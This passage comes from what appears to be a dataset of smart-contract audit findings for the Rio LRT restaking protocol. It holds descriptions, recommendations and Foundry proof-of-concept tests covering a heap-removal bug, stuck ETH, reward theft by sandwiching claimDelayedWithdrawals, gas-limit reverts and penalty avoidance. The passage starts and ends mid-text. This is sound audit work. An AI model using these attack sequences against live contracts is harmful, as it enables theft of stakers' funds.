operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n\\n`removeByID` calls the internal `_remove` function which is NOT removes the last element! `self.count` is decreased however, the index is still the previous value of the `self.count`\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[self.count--];\\n }\\n```\\n\\nFor example, if there are 3 operators as follows: operatorId: 1, utilization: 50% operatorId: 2, utilization: 60% operatorId: 3, utilization: 70% then, the `heap.count` would be 3 and the order would be: 1, 2, 3 in the heap heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 3\\nif we remove the operator Id 2: `heap.count` = 2 order: 1,3 heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 0 THIS SHOULD BE ""0"" since its removed but it is ""3"" in the current implementation!\\nAs shown here, the operators[3] should be ""0"" since there isn't any operator3 in the heap anymore but the heap keeps the value and not resets it.\\nHere a test shows the above issue:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_removingDoesNotUpdatesStoredHeap -vv\\n function test_removingDoesNotUpdatesStoredHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 50}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 60}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, 
utilization: 70}));\\n heap.store(heapStore);\\n\\n console.log(""Heaps count"", heap.count);\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n\\n // remove 2\\n heap.removeByID(3);\\n heap.store(heapStore);\\n\\n console.log(""Heaps count"", heap.count);\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n }\\n```\\n\\nLogs:\\n2- When the operator cap is reseted the allocations/deallocations will not work due to above heap issue because of division by zero\\nNow, take the above example, we removed the operatorId 3 from the heap by setting its cap to ""0"". Now, there are only operators 1 and 2 active for that specific strategy. When there are idle funds in the deposit pool before the rebalance call, the excess funds that are not requested as withdrawals will be pushed to EigenLayer as follows:\\n```\\nfunction rebalance(address asset) external checkRebalanceDelayMet(asset) {\\n .\\n .\\n -> (uint256 sharesReceived, bool isDepositCapped) = depositPool().depositBalanceIntoEigenLayer(asset);\\n .\\n }\\n```\\n\\n```\\n function depositBalanceIntoEigenLayer(address asset) external onlyCoordinator returns (uint256, bool) {\\n uint256 amountToDeposit = asset.getSelfBalance();\\n if (amountToDeposit == 0) return (0, false);\\n .\\n .\\n -> return (OperatorOperations.depositTokenToOperators(operatorRegistry(), asset, strategy, sharesToAllocate), isDepositCapped);\\n }\\n```\\n\\n```\\nfunction depositTokenToOperators(\\n IRioLRTOperatorRegistry operatorRegistry,\\n address token,\\n address strategy,\\n uint256 sharesToAllocate\\n ) internal returns (uint256 sharesReceived) {\\n -> (uint256 sharesAllocated, IRioLRTOperatorRegistry.OperatorStrategyAllocation[] memory allocations) = operatorRegistry.allocateStrategyShares(\\n strategy, sharesToAllocate\\n );\\n .\\n .\\n 
}\\n```\\n\\n```\\nfunction allocateStrategyShares(address strategy, uint256 sharesToAllocate) external onlyDepositPool returns (uint256 sharesAllocated, OperatorStrategyAllocation[] memory allocations) {\\n -> OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForStrategy(strategy);\\n .\\n .\\n .\\n .\\n }\\n```\\n\\n```\\nfunction getOperatorUtilizationHeapForStrategy(RioLRTOperatorRegistryStorageV1.StorageV1 storage s, address strategy) internal view returns (OperatorUtilizationHeap.Data memory heap) {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n \\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n LibMap.Uint8Map storage operators = s.activeOperatorsByStrategyShareUtilization[strategy];\\n\\n IRioLRTOperatorRegistry.OperatorShareDetails memory operatorShares;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = operators.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n operatorShares = s.operatorDetails[operatorId].shareDetails[strategy];\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n -> utilization: operatorShares.allocation.divWad(operatorShares.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nAs we can see in one above code snippet, the `numActiveOperators` is 3. Since the stored heaps last element is not set to ""0"" it will point to operatorId 3 which has a cap of ""0"" after the removal. 
This will make the\\n```\\nutilization: operatorShares.allocation.divWad(operatorShares.cap)\\n```\\n\\npart of the code to perform a division by zero and the function will revert.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorRegistryTest --match-test test_Capped0ValidatorBricksFlow -vv\\n function test_Capped0ValidatorBricksFlow() public {\\n // Add 3 operators\\n addOperatorDelegators(reLST.operatorRegistry, address(reLST.rewardDistributor), 3);\\n\\n // The caps for each operator is 1000e18, we will delete the id 2 so we need funds there\\n // any number that is more than 1000 should be ok for that experiement \\n uint256 AMOUNT = 1002e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n // Build the empty caps\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](1);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n // Set the caps of CBETH_STRATEGY for operator 2 as ""0""\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(2, zeroStrategyShareCaps);\\n\\n // Try an another deposit, we expect revert when we do the rebalance\\n reLST.coordinator.deposit(CBETH_ADDRESS, 10e18);\\n\\n // Push funds into EigenLayer. 
Expect revert, due to division by ""0""\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.startPrank(EOA, EOA);\\n vm.expectRevert(bytes4(keccak256(""DivWadFailed()"")));\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n vm.stopPrank();\\n }\\n```\\n","When removing from the heap also remove the last element from the heap.\\nI am not sure of this, but this might work\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[--self.count];\\n }\\n```\\n","Core logic broken, withdrawal/deposits can not be performed.","```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n" +Ether can stuck when an operators validators are removed due to an user front-running,medium,"When a full withdrawal occurs in the EigenPod, the excess amount can remain idle within the EigenPod and can only be swept by calling a function in the delegator contract of a specific operator. 
However, in cases where the owner removes all validators for emergencies or any other reason, a user can frontrun the transaction, willingly or not, causing the excess ETH to become stuck in the EigenPod. The only way to recover the ether would be for the owner to reactivate the validators, which may not be intended since the owner initially wanted to remove all the validators and now needs to add them again.\\nLet's assume a Layered Relay Token (LRT) with a beacon chain strategy and only two operators for simplicity. Each operator is assigned two validators, allowing each operator to stake 64 ETH in the PoS staking via the EigenPod.\\nThis function triggers a full withdrawal from the operator's delegator EigenPod. The `queueOperatorStrategyExit` function will withdraw the entire validator balance as follows:\\n```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n\\n`operatorDetails.queueOperatorStrategyExit` function will full withdraw the entire validator balance as follows:\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n IRioLRTOperatorDelegator delegator = IRioLRTOperatorDelegator(operator.delegator);\\n\\n uint256 sharesToExit;\\n if (strategy == BEACON_CHAIN_STRATEGY) {\\n // Queues an exit for verified validators only. Unverified validators must by exited once verified,\\n // and ETH must be scraped into the deposit pool. Exits are rounded to the nearest Gwei. It is not\\n // possible to exit ETH with precision less than 1 Gwei. 
We do not populate `sharesToExit` if the\\n // Eigen Pod shares are not greater than 0.\\n int256 eigenPodShares = delegator.getEigenPodShares();\\n if (eigenPodShares > 0) {\\n sharesToExit = uint256(eigenPodShares).reducePrecisionToGwei();\\n }\\n } else {\\n .\\n }\\n .\\n }\\n```\\n\\nAs observed, the entire EigenPod shares are requested as a withdrawal, which is 64 Ether. However, a user can request a 63 Ether withdrawal before the owner's transaction from the coordinator, which would also trigger a full withdrawal of 64 Ether. In the end, the user would receive 63 Ether, leaving 1 Ether idle in the EigenPod:\\n```\\nfunction queueETHWithdrawalFromOperatorsForUserSettlement(IRioLRTOperatorRegistry operatorRegistry, uint256 amount) internal returns (bytes32 aggregateRoot) {\\n .\\n for (uint256 i = 0; i < length; ++i) {\\n address delegator = operatorDepositDeallocations[i].delegator;\\n\\n -> // Ensure we do not send more than needed to the withdrawal queue. The remaining will stay in the Eigen Pod.\\n uint256 amountToWithdraw = (i == length - 1) ? remainingAmount : operatorDepositDeallocations[i].deposits * ETH_DEPOSIT_SIZE;\\n\\n remainingAmount -= amountToWithdraw;\\n roots[i] = IRioLRTOperatorDelegator(delegator).queueWithdrawalForUserSettlement(BEACON_CHAIN_STRATEGY, amountToWithdraw);\\n }\\n .\\n }\\n```\\n\\nIn such a scenario, the queued amount would be 63 Ether, and 1 Ether would remain idle in the EigenPod. Since the owner's intention was to shut down the validators in the operator for good, that 1 Ether needs to be scraped as well. 
However, the owner is unable to sweep it due to MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE:\\n```\\nfunction scrapeExcessFullWithdrawalETHFromEigenPod() external {\\n // @review this is 1 ether\\n uint256 ethWithdrawable = eigenPod.withdrawableRestakedExecutionLayerGwei().toWei();\\n // @review this is also 1 ether\\n -> uint256 ethQueuedForWithdrawal = getETHQueuedForWithdrawal();\\n if (ethWithdrawable <= ethQueuedForWithdrawal + MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE) {\\n revert INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH();\\n }\\n _queueWithdrawalForOperatorExitOrScrape(BEACON_CHAIN_STRATEGY, ethWithdrawable - ethQueuedForWithdrawal);\\n }\\n```\\n\\nWhich means that the owner has to set the validator caps for the operator again to recover that 1 ether, which might not be possible since the owner decided to shut down all the validators for the specific operator.\\nAnother scenario from the same root cause: 1- There are 64 ether in an operator 2- Someone requests a withdrawal of 50 ether 3- All 64 ether is withdrawn from beacon chain 4- 50 ether is sent to the user's withdrawal, 14 ether is idle in the EigenPod waiting for someone to call `scrapeExcessFullWithdrawalETHFromEigenPod` 5- A user quickly withdraws 13 ether 6- `withdrawableRestakedExecutionLayerGwei` is 1 ether and `INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH` also 1 ether. 
Which means the 1 ether can't be re-added to deposit pool until someone withdraws.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorDelegatorTest --match-test test_StakeETHCalledWith0Ether -vv\\n function test_StuckEther() public {\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n address operatorDelegator = reETH.operatorRegistry.getOperatorDetails(operatorId).delegator;\\n\\n uint256 TVL = 64 ether;\\n uint256 WITHDRAWAL_AMOUNT = 63 ether;\\n RioLRTOperatorDelegator delegatorContract = RioLRTOperatorDelegator(payable(operatorDelegator));\\n\\n // Allocate ETH.\\n reETH.coordinator.depositETH{value: TVL - address(reETH.depositPool).balance}();\\n\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n\\n // Verify validator withdrawal credentials.\\n uint40[] memory validatorIndices = verifyCredentialsForValidators(reETH.operatorRegistry, operatorId, 2);\\n\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Withdraw some funds.\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, WITHDRAWAL_AMOUNT);\\n uint256 withdrawalEpoch = reETH.withdrawalQueue.getCurrentEpoch(ETH_ADDRESS);\\n\\n // Skip ahead and rebalance to queue the withdrawal within EigenLayer.\\n skip(reETH.coordinator.rebalanceDelay());\\n\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Settle with withdrawal epoch.\\n IDelegationManager.Withdrawal[] memory withdrawals = new IDelegationManager.Withdrawal[](1);\\n withdrawals[0] = IDelegationManager.Withdrawal({\\n staker: operatorDelegator,\\n delegatedTo: address(1),\\n withdrawer: address(reETH.withdrawalQueue),\\n nonce: 0,\\n startBlock: 1,\\n strategies: 
BEACON_CHAIN_STRATEGY.toArray(),\\n shares: WITHDRAWAL_AMOUNT.toArray()\\n });\\n reETH.withdrawalQueue.settleEpochFromEigenLayer(ETH_ADDRESS, withdrawalEpoch, withdrawals, new uint256[](1));\\n\\n vm.expectRevert(bytes4(keccak256(""INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH()"")));\\n delegatorContract.scrapeExcessFullWithdrawalETHFromEigenPod();\\n }\\n```\\n",Make an emergency function which owner can scrape the excess eth regardless of `MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE`,"Owner needs to set the caps again to recover the 1 ether. However, the validators are removed for a reason and adding operators again would probably be not intended since it was a shutdown. Hence, I'll label this as medium.","```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n" +A part of ETH rewards can be stolen by sandwiching `claimDelayedWithdrawals()`,medium,"Rewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe protocol handles ETH rewards by sending them to the rewards distributor. There are at least 3 flows that end-up sending funds there:\\nWhen the function RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod() is called to scrape non beacon chain ETH from an Eigenpod.\\nWhen a validator receives rewards via partial withdrawals after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nWhen a validator exists and has more than 32ETH the excess will be sent as rewards after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nAll of these 3 flows end up queuing a withdrawal to the rewards distributor. 
After a delay the rewards can claimed by calling the permissionless function EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), this call will instantly increase the TVL of the protocol.\\nAn attacker can take advantage of this to steal a part of the rewards:\\nMint a sensible amount of `LRTTokens` by depositing an accepted asset\\nCall EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), after which the value of the `LRTTokens` just minted will immediately increase.\\nRequest a withdrawal for all the `LRTTokens` via RioLRTCoordinator::requestWithdrawal().\\nPOC\\nChange RioLRTRewardsDistributor::receive() (to side-step a gas limit bug:\\n```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n\\nAdd the following imports to RioLRTOperatorDelegator:\\n```\\nimport {IRioLRTWithdrawalQueue} from 'contracts/interfaces/IRioLRTWithdrawalQueue.sol';\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nTo copy-paste in RioLRTOperatorDelegator.t.sol:\\n```\\nfunction test_stealRewards() public {\\n address alice = makeAddr(""alice"");\\n address bob = makeAddr(""bob"");\\n uint256 aliceInitialBalance = 40e18;\\n uint256 bobInitialBalance = 40e18;\\n deal(alice, aliceInitialBalance);\\n deal(bob, bobInitialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n vm.prank(bob);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n 
//-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: aliceInitialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to ""simulate"" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> A full withdrawal for the validator is processed, 8ETH (40ETH - 32ETH) will be queued as rewards\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Bob, an attacker, does the following:\\n // 1. Deposits 40ETH and receives ~40e18 LRTTokens\\n // 2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n // 3. Requests a withdrawal with all of the LRTTokens \\n {\\n //1. Deposits 40ETH and receives ~40e18 LRTTokens\\n vm.startPrank(bob);\\n reETH.coordinator.depositETH{value: bobInitialBalance}();\\n\\n //2. 
Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n uint256 TVLBefore = reETH.assetRegistry.getTVL();\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); \\n uint256 TVLAfter = reETH.assetRegistry.getTVL();\\n\\n //->TVL increased by 7.2ETH\\n assertEq(TVLAfter - TVLBefore, 7.2e18);\\n\\n //3. Requests a withdrawal with all of the LRTTokens \\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, reETH.token.balanceOf(bob));\\n vm.stopPrank();\\n }\\n \\n //-> Wait and rebalance\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Bob withdraws the funds he requested\\n vm.prank(bob);\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n\\n //-> Bob has stole ~50% of the rewards and has 3.59ETH more than he initially started with\\n assertGt(bob.balance, bobInitialBalance);\\n assertEq(bob.balance - bobInitialBalance, 3599550056000000000);\\n}\\n```\\n",When requesting withdrawals via RioLRTCoordinator::requestWithdrawal() don't distribute the rewards received in the current epoch.,"Rewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), however this requires a bigger investment in funds the higher the protocol TVL.","```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n" +The protocol can't receive rewards because of low gas limits on ETH transfers,medium,"The hardcoded gas limit of the Asset::transferETH() function, used to transfer ETH in the protocol, is too low and will result unwanted reverts.\\nETH transfers in the protocol are always done via Asset::transferETH(), which performs a low-level call with an hardcoded gas limit of 10_000:\\n```\\n(bool success,) = recipient.call{value: amount, gas: 
10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n\\nThe hardcoded `10_000` gas limit is not high enough for the protocol to be able to receive and distribute rewards. Rewards are currently only available for native ETH, and are received by Rio via:\\nPartial withdrawals\\nETH in excess of `32ETH` on full withdrawals\\nThe flow to receive rewards requires two steps:\\nAn initial call to EigenPod::verifyAndProcessWithdrawals(), which queues a withdrawal to the Eigenpod owner: an `RioLRTOperatorDelegator` instance\\nA call to DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe call to DelayedWithdrawalRouter::claimDelayedWithdrawals() triggers the following flow:\\nETH are transferred to the RioLRTOperatorDelegator instance, where the `receive()` function is triggered.\\nThe `receive()` function of RioLRTOperatorDelegator transfers ETH via Asset::transferETH() to the RioLRTRewardDistributor, where another `receive()` function is triggered.\\nThe `receive()` function of RioLRTRewardDistributor transfers ETH via Asset::transferETH() to the `treasury`, the `operatorRewardPool` and the `RioLRTDepositPool`.\\nThe gas is limited at `10_000` in step `2` and is not enough to perform step `3`, making it impossible for the protocol to receive rewards and leaving funds stuck.\\nPOC\\nAdd the following imports to RioLRTOperatorDelegator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nfunction test_outOfGasOnRewards() public {\\n address alice = makeAddr(""alice"");\\n uint256 initialBalance = 40e18;\\n deal(alice, initialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the 
protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: initialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to ""simulate"" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> Process a full withdrawal, 8ETH (40ETH - 32ETH) will be queued withdrawal as ""rewards""\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Call `claimDelayedWithdrawals` to claim the withdrawal\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); //❌ Reverts for out-of-gas\\n}\\n```\\n","Remove the hardcoded `10_000` gas limit in Asset::transferETH(), at least on ETH transfers where the destination is a protocol controlled contract.",The protocol is unable 
to receive rewards and the funds will be stucked.,"```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n" +Stakers can avoid validator penalties,medium,"Stakers can frontrun validators penalties and slashing events with a withdrawal request in order to avoid the loss, this is possible if the deposit pool has enough liquidity available.\\nValidators can lose part of their deposit via penalties or slashing events:\\nIn case of penalties Eigenlayer can be notified of the balance drop via the permissionless function EigenPod::verifyBalanceUpdates().\\nIn case of slashing the validator is forced to exit and Eigenlayer can be notified via the permissionless function EigenPod::verifyAndProcessWithdrawals() because the slashing event is effectively a full withdrawal.\\nAs soon as either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() is called the TVL of the Rio protocol drops instantly. This is because both of the functions update the variable podOwnerShares[podOwner]:\\nEigenPod::verifyBalanceUpdates() will update the variable here\\nEigenPod::verifyAndProcessWithdrawals() will update the variable here\\nThis makes it possible for stakers to:\\nRequest a withdrawal via RioLRTCoordinator::rebalance() for all the `LRTTokens` held.\\nCall either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals().\\nAt this point when RioLRTCoordinator::rebalance() will be called and a withdrawal will be queued that does not include penalties or slashing.\\nIt's possible to withdraw `LRTTokens` while avoiding penalties or slashing up to the amount of liquidity available in the deposit pool.\\nPOC\\nI wrote a POC whose main point is to show that requesting a withdrawal before an instant TVL drop will withdraw the full amount requested without taking the drop into account. 
The POC doesn't show that EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() actually lowers the TVL because I wasn't able to implement it in the tests.\\nAdd imports to RioLRTCoordinator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nIRioLRTOperatorRegistry.StrategyShareCap[] public emptyStrategyShareCaps;\\nfunction test_avoidInstantPriceDrop() public {\\n //-> Add two operators with 1 validator each\\n uint8[] memory operatorIds = addOperatorDelegators(\\n reETH.operatorRegistry,\\n address(reETH.rewardDistributor),\\n 2,\\n emptyStrategyShareCaps,\\n 1\\n );\\n address operatorAddress0 = address(uint160(1));\\n\\n //-> Deposit ETH so there's 74ETH in the deposit pool\\n uint256 depositAmount = 2*ETH_DEPOSIT_SIZE - address(reETH.depositPool).balance;\\n uint256 amountToWithdraw = 10 ether;\\n reETH.coordinator.depositETH{value: amountToWithdraw + depositAmount}();\\n\\n //-> Stake the 64ETH on the validators, 32ETH each and 10 ETH stay in the deposit pool\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker notices a validator is going receive penalties and immediately requests a withdrawal of 10ETH\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, amountToWithdraw);\\n\\n //-> Validator get some penalties and Eigenlayer notified \\n //IMPORTANT: The following block of code it's a simulation of what would happen if a validator balances gets lowered because of penalties\\n //and `verifyBalanceUpdates()` gets called on Eigenlayer. 
It uses another bug to achieve an instant loss of TVL.\\n\\n // ~~~Start penalties simulation~~~\\n {\\n //-> Verify validators credentials of the two validators\\n verifyCredentialsForValidators(reETH.operatorRegistry, 1, 1);\\n verifyCredentialsForValidators(reETH.operatorRegistry, 2, 1);\\n\\n //-> Cache current TVL and ETH Balance\\n uint256 TVLBefore = reETH.coordinator.getTVL();\\n\\n //->Operator calls `undelegate()` on Eigenlayer\\n //IMPORTANT: This achieves the same a calling `verifyBalanceUpdates()` on Eigenlayer after a validator suffered penalties,\\n //an instant drop in TVL.\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorIds[0]);\\n vm.prank(operatorAddress0);\\n delegationManager.undelegate(details.delegator);\\n\\n //-> TVL dropped\\n uint256 TVLAfter = reETH.coordinator.getTVL();\\n\\n assertLt(TVLAfter, TVLBefore);\\n }\\n // ~~~End penalties simulation~~~\\n\\n //-> Rebalance gets called\\n 